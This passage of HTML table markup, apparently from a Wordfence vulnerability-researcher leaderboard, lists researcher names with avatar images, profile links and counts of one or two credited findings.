</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c10dbe06f111ce709fdc2628e94ac9a1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c10dbe06f111ce709fdc2628e94ac9a1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener">Mitchell</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jeremy-felt" target="_blank" rel="noopener">Jeremy Felt</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0f962dd7143eb1e6e46c9632a10cf4cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f962dd7143eb1e6e46c9632a10cf4cf"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">Yuto Hyakumoto</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7f4bd9017dada52c54654420190e89ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7f4bd9017dada52c54654420190e89ba"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pbsec" target="_blank" rel="noopener">pb&gt;sec</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mike-gozdiskowski" target="_blank" rel="noopener">Mike Gozdiskowski</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/21afa6c796a1f23334897b28cd162f6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="21afa6c796a1f23334897b28cd162f6c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nixxies" target="_blank" rel="noopener">Nixxies</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anthropic" target="_blank" rel="noopener">Anthropic</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/fe579addc0911a2c540649603887f8b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fe579addc0911a2c540649603887f8b3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/binesh-madharapu" target="_blank" rel="noopener">Binesh Madharapu</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/99734a20388f02c119e5f829dc282f10.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="99734a20388f02c119e5f829dc282f10"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shirshak" target="_blank" rel="noopener">Shirshak</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d923d0a20877857f86aaa6c686c92bdc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d923d0a20877857f86aaa6c686c92bdc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/waris-damkham" target="_blank" rel="noopener">Waris Damkham</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6754bff8e85ed195d196959c828257ad.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6754bff8e85ed195d196959c828257ad"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luca-jungnickel" target="_blank" rel="noopener">Luca Jungnickel</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bded93ac30db05695b969d802a1b2096.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bded93ac30db05695b969d802a1b2096"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nicat-sultanov" target="_blank" rel="noopener">Nicat Sultanov</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/330e80e945f955de7587e8496f9e1cee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="330e80e945f955de7587e8496f9e1cee"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan (NomanProdhan)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/59aa670a7e8efd95bdb8f5b0bc55a0db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="59aa670a7e8efd95bdb8f5b0bc55a0db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anhdung1329" target="_blank" rel="noopener">anhdung1329</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ce4cc1e08c1c7767526ccb8a686f2050.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ce4cc1e08c1c7767526ccb8a686f2050"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yassin-mohamed" target="_blank" rel="noopener">Yassin Mohamed</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/58c83c2ee8fe4e2dcfc655549b98c0fb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="58c83c2ee8fe4e2dcfc655549b98c0fb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quang-ha" target="_blank" rel="noopener">Quang</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/585bd77d4bbe100a43b04223fd09a74f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="585bd77d4bbe100a43b04223fd09a74f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-soares-de-alcantara" target="_blank" rel="noopener">João Pedro Soares de Alcântara</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/039118b396dab471df2ada3e4dc72d54.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="039118b396dab471df2ada3e4dc72d54"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan-2" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bc0ca0683e2f48d801834cc849d05ed9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bc0ca0683e2f48d801834cc849d05ed9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener">zickzick2</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5326da6569401f522574666ccc1081ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5326da6569401f522574666ccc1081ba"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/valatty" target="_blank" rel="noopener">Valatty</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1765d6f8531a84a95bd60429d57538f0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1765d6f8531a84a95bd60429d57538f0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yzx001" target="_blank" rel="noopener">yzx001</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/184bdd6c8c8fd34f7aa5552f451620b5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="184bdd6c8c8fd34f7aa5552f451620b5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sergey-mkrtchyan" target="_blank" rel="noopener">Sergey Mkrtchyan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3e1f272565d9a00d35ec564d999687a0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3e1f272565d9a00d35ec564d999687a0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jaskaranjeet-singh" target="_blank" rel="noopener">Jaskaranjeet Singh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f16f92680f902826c363c531ea949a90.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f16f92680f902826c363c531ea949a90"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trung-hieu" target="_blank" rel="noopener">Hieus</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9d5a6e35f43bcf689368d3af692fc7b2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9d5a6e35f43bcf689368d3af692fc7b2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arthur-morgan" target="_blank" rel="noopener">Arthur Morgan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/50eed0e6c3616a3070c5f1b5345192dd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="50eed0e6c3616a3070c5f1b5345192dd"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonathan-dersch" target="_blank" rel="noopener">Jonathan Dersch</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/26ce90113d4042786e58539c132e02bd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26ce90113d4042786e58539c132e02bd"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/henise" target="_blank" rel="noopener">henise</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ben-bidner" target="_blank" rel="noopener">Ben Bidner</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1e1133a510e613ab214627aceaeea121.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1e1133a510e613ab214627aceaeea121"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trung-huynh-chi" target="_blank" rel="noopener">Chi Trung Huynh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f546a55ea8a458c8a23c201bdf66f30a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f546a55ea8a458c8a23c201bdf66f30a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pradeep-suvarna" target="_blank" rel="noopener">pradeep suvarna</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ab7efdb720bbddbd6d7f9d5def42e06a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ab7efdb720bbddbd6d7f9d5def42e06a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/reconnaissance" target="_blank" rel="noopener">reconnaissance</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/25c43c189f7a76c6c014a90b5e4c7de2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="25c43c189f7a76c6c014a90b5e4c7de2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hillary-mutai" target="_blank" rel="noopener">Hillary Mutai</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/72bab04a62ba550220dbf14bbbc81dbd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="72bab04a62ba550220dbf14bbbc81dbd"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/niv-kochan" target="_blank" rel="noopener">Niv Kochan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/99e52acf5bb16bf6be6e9e6e79c599b4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="99e52acf5bb16bf6be6e9e6e79c599b4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/matan-bahar" target="_blank" rel="noopener">Matan Bachar</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6ca918101b905ebc548314f9a30d65f1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6ca918101b905ebc548314f9a30d65f1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/devlin-jenkins" target="_blank" rel="noopener">Devlin Jenkins</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7b84eb12774101c14374003feb2e7d67.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7b84eb12774101c14374003feb2e7d67"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cyberdesu" target="_blank" rel="noopener">Suredsi Ulpada (cyberdesu)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ef9ce43e8a09db904dc26bffcab4c696.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ef9ce43e8a09db904dc26bffcab4c696"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/john-ryan-albon" target="_blank" rel="noopener">John Ryan Albon</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/26a32c073d7e4edde36367c0e7b51808.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26a32c073d7e4edde36367c0e7b51808"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/skyv3il" target="_blank" rel="noopener">skyv3il</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8d0b3f283d2748d1077325cb2522f7ff.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8d0b3f283d2748d1077325cb2522f7ff"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chirita-catalin-andrei-cc99ie" target="_blank" rel="noopener">Chirita Catalin-Andrei (CC99IE)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/691c3168925c59eae700032d1721a348.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="691c3168925c59eae700032d1721a348"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amonra" target="_blank" rel="noopener">AmonRa</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cd6f772c2edc5370a6f2829036933466.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd6f772c2edc5370a6f2829036933466"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mrproperctf" target="_blank" rel="noopener">MrProperCTF</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4240823195d4b265f3cd4ca5947a5e1c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4240823195d4b265f3cd4ca5947a5e1c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener">Adam Rayyan Aryasatya</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c9bdb8257ff6271832223102c3f02d69.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c9bdb8257ff6271832223102c3f02d69"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amity-gilmour" target="_blank" rel="noopener">Amity Gilmour</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/22d12b4c44e574b32a29d063142b8954.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="22d12b4c44e574b32a29d063142b8954"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-willows" target="_blank" rel="noopener">Brian Willows</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ce1fa8b42931a00204df4e057e0ab1a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ce1fa8b42931a00204df4e057e0ab1a5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-pham" target="_blank" rel="noopener">Pham Duc Anh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/08527e440d77f24880a4d8811a7f8d7d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="08527e440d77f24880a4d8811a7f8d7d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/a1" target="_blank" rel="noopener">san6051</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4c713783cef57ea8eeef5b9a8f58c34b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c713783cef57ea8eeef5b9a8f58c34b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arya-prasetyo" target="_blank" rel="noopener">sorawautsukushiii</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c3ef45be20d7341d9a6867bd0a4c8a2f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c3ef45be20d7341d9a6867bd0a4c8a2f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/angel-ps" target="_blank" rel="noopener">Ángel PS</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9e8c4676e82018ccf86cc684191f1e94.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9e8c4676e82018ccf86cc684191f1e94"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anton-naumovich" target="_blank" rel="noopener">RIA Labs</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c451f7be2150d3f56bd9dd4de4f1998b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c451f7be2150d3f56bd9dd4de4f1998b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/achmad-adhikara" target="_blank" rel="noopener">adhikara13</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e66631a82bedaeec90118eb6ae46faab.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e66631a82bedaeec90118eb6ae46faab"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman-2" target="_blank" rel="noopener">Jakub Herman</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6dd380c38e13e8dc02631e8ea879a9e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6dd380c38e13e8dc02631e8ea879a9e4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener">benzdeus</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b0b89fc5d65efdc4ed0d0d90425b6938.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0b89fc5d65efdc4ed0d0d90425b6938"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rajivraj" target="_blank" rel="noopener">rajivraj</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dd20b99aec2d2287d2a86d71af4da7e5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd20b99aec2d2287d2a86d71af4da7e5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shhriyash" target="_blank" rel="noopener">Shhriyash</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/58f819303e23c511f57be35a71c19f7d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="58f819303e23c511f57be35a71c19f7d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kaan-ozbek-2" target="_blank" rel="noopener">Kaan Özbek</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/fd81b18fe6c92416befa120a66189f65.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fd81b18fe6c92416befa120a66189f65"><br />
